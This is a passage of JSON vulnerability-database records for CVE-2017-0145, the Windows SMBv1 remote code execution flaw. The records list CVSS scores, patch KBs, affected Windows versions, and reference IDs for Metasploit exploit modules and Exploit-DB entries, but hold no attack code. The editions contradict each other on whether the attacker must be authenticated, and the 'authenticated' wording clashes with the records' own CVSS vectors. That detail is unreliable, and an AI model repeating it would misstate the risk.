"MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-33895"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", 
"RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T00:58:24", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-19T00:58:24", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB3205409", "KB4012212", "KB4012213", "KB3212646", "KB3210720", "KB3177186", "KB4012606", "KB4012214", "KB3213986", "KB4012217", "KB4012215", "KB3210721", "KB4014077", "KB4013429", "KB4012598", "KB4013198", "KB3205401", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", 
"kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", 
"msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T00:58:24", "differentElements": ["msAffectedSoftware"], "edition": 60}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A 
remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server (consistent with the Au:N / PR:N values in this record's CVSS vectors).\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-19T08:49:10", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 
"MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", 
"RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T08:49:10", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-19T08:49:10", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KBMS16-110, 3187754", "KB3212646", "KB4013198", "KB4012215", "KB4012217", "KB4012213", "KB4013429", "KB3210721", "KB4012212", "KB4012606", "KB3213986", "KB4014077", "KB3205409", "KB3210720", "KB4012216", "KB4012214", "KB4012598", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": 
"KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": 
"KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit 
Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T08:49:10", "differentElements": ["msAffectedSoftware"], "edition": 61}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-19T10:51:44", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", 
"MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", 
